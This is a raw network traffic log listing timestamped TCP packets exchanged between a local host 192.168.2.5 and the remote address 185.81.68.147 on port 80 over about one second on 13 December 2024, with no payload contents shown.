Dec 13, 2024 01:37:20.628927946 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.628993034 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.629040956 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.696851015 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.696863890 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.696917057 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.699271917 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.699379921 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.699426889 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.707681894 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.707801104 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.707969904 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.716068029 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.716164112 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.716206074 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.724405050 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.724529028 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.724571943 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.732794046 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.732877970 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.732918024 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.741187096 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.741236925 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.741307974 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.749538898 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.749640942 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.749689102 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.757935047 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.758029938 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.758119106 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.766334057 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.766436100 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.766478062 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.773569107 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.773679018 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.773722887 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.780838966 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.780927896 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.780966043 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.816643000 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.864088058 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.889003992 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.889076948 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.889134884 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.891249895 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.891372919 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.891427994 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.895900011 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.897607088 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.897661924 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.897674084 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.902256012 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.902309895 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.902378082 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.906894922 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.906950951 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.907001972 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.911565065 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.911669016 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.911731958 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.915992975 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.916049957 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.916172028 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.920392036 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.920449018 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.920504093 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.924808025 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.924863100 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.924943924 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.929270029 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.929333925 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.929380894 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.933679104 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.933738947 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.933824062 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.938112974 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.938163996 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.938169956 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.942543030 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.942604065 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.942643881 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.946970940 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.947031021 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.947073936 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.951404095 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.951462984 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.951525927 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.955830097 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.955887079 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.955950022 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.960263014 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.960331917 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.960387945 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.964725018 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.964817047 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.964879990 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.969168901 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.969227076 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.969253063 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.973546982 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.973598957 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.973675013 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.977981091 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.978038073 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.978104115 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.982449055 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.982522011 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.982548952 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.986820936 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.987044096 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.080979109 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.081017971 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.081118107 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.082691908 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.082811117 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.082874060 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.086297989 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.086421013 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.086491108 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.089945078 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.089997053 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.090091944 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.093626022 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.093770027 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.093825102 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.096875906 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.096957922 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.097017050 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.100250959 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.100450993 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.100511074 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.103529930 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.103610039 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.103667021 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.106803894 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.106926918 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.106986046 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.110009909 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.110100985 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.110155106 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.113152981 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.113253117 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.113300085 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.116213083 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.116249084 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.116291046 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.119282007 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.119389057 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.119441032 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.122354031 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.122394085 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.122453928 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.125462055 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.125550032 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.125643015 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.128474951 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.128561974 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.128631115 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.131561995 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.131678104 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.131732941 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.134615898 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.134716034 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.134769917 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.137689114 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.137782097 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.137835979 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.140753031 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.140849113 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.140937090 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.143851042 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.143961906 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.144037962 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.146955013 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.147053957 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.147274971 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.150016069 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.150068045 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.150151968 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.153064966 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.153175116 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.153299093 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.156155109 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.156250000 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.156303883 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.159290075 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.159343004 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.159415007 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.162389040 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.162465096 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.162529945 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.165355921 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.165435076 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.165488005 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.168407917 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.168504000 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.168560028 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.171526909 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.171544075 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.171598911 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.174530983 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.174632072 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.174701929 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.177639008 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.177700996 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.177769899 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.180701017 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.180788994 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.180861950 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.183736086 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.183861017 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.183928967 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.186816931 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.186894894 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.186965942 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.272937059 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.272977114 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.273022890 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.274061918 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.274133921 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.274172068 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.276038885 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.276124001 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.276165962 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.278485060 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.278584003 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.278623104 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.281021118 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.281111002 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.281147003 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.283396006 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.283485889 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.283534050 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.285753012 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.285841942 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.285888910 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.288090944 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.288158894 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.288283110 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.290352106 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.290437937 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.290478945 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.292617083 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.292716980 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.292766094 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.294795036 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.294858932 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.294981956 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.296998024 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.297080040 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.297148943 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.299146891 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.299232960 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.299278021 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.301285982 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.301379919 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.301500082 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.303400040 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.303528070 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.303574085 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.305500031 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.305592060 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.305630922 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.307532072 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.307620049 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.307679892 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.309597015 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.309674025 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.310009003 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.311615944 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.311669111 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.311753988 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.313643932 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.313707113 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.313769102 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.315613985 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.315710068 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.315758944 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.317610025 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.317709923 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.317753077 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.319622993 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.319700956 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.319763899 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.321625948 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.321703911 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.323616028 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.323682070 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.323710918 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.323749065 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.325597048 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.325691938 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.325746059 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.327606916 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.327704906 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.327764034 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.329601049 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.329688072 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.329745054 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.331609011 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.331697941 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.331800938 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.333620071 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.333694935 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.333733082 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.335607052 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.335705996 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.335753918 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.337604046 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.337703943 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.337740898 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.339585066 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.339709997 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.339759111 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.341593027 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.341768026 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.341857910 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.343637943 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.343718052 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.343753099 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.345585108 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.345696926 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.345774889 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.347595930 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.347700119 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.347970009 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.349608898 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.349770069 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.349817991 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.351641893 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.351727009 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.351891994 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.353606939 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.353708982 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.353782892 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.355607033 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.355721951 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.355791092 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.357621908 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.357722998 CET	80	49719	185.81.68.147	192.168.2.5
